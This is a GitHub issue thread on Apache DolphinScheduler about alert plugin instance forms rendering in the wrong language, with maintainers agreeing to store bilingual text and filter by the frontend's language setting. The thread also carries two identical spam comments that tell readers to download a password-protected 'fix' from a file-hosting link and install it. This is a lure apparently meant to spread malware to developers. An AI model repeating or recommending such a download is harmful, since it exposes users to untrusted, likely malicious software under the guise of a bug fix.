### ISSUE TITLE
[Bug] [Alert Instance] Alert plugin instance i18n wrong result in rendering frontend ui

### ISSUE THREAD

**Issue by SbloodyS** [apache/dolphinscheduler#16517]
### Search before asking

- [X] I had searched in the [issues](https://github.com/apache/dolphinscheduler/issues?q=is%3Aissue) and found no similar issues.

### What happened

Alert plugin instance i18n wrong result in rendering frontend ui. The language type of the page is abnormal in ui.

### What you expected to happen

Normal.

### How to reproduce

aboved.

### Version

dev

### Are you willing to submit PR?

- [X] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sdhzwc** [comment]
I am thinking of returning all at the back-end code level. Later, through front-end judgment, I choose which language to reference to implement this requirement.

**Comment by SbloodyS** [comment]
> I am thinking of returning all at the back-end code level. Later, through front-end judgment, I choose which language to reference to implement this requirement.

The current logic will store the front-end rendering information into the database in the alert module. Because there is only one type of language in the database, the rendering information obtained by the front-end calling the back-end API to query the database cannot be switched languages.

**Comment by sdhzwc** [comment]
> > I am thinking of returning all at the back-end code level. Later, through front-end judgment, I choose which language to reference to implement this requirement.
> 
> The current logic will store the front-end rendering information into the database in the alert module. Because there is only one type of language in the database, the rendering information obtained by the front-end calling the back-end API to query the database cannot be switched languages.

![image](https://github.com/user-attachments/assets/809030b9-003a-4eee-9b12-43d583dc2d41)
![image](https://github.com/user-attachments/assets/0d77c26e-7a1c-40e7-9d23-36652b2d7605)
something like this

**Comment by sdhzwc** [comment]
The results of the wechat communication are synchronized as follows, I'll do the fix if I can：
Simple ones can store Chinese and English information in the database. The controller filters according to the front-end language parameters. In the final version in the future, the interaction with the database should be removed. But I feel that this is a major overhaul and it should take a long time. I suggest fixing this first. Otherwise, several releases in the future will show errors.

**Comment by SbloodyS** [comment]
> The results of the wechat communication are synchronized as follows, I'll do the fix if I can： Simple ones can store Chinese and English information in the database. The controller filters according to the front-end language parameters. In the final version in the future, the interaction with the database should be removed. But I feel that this is a major overhaul and it should take a long time. I suggest fixing this first. Otherwise, several releases in the future will show errors.

I'm ok with this.

**Comment by davidzollo** [comment]
ok with me
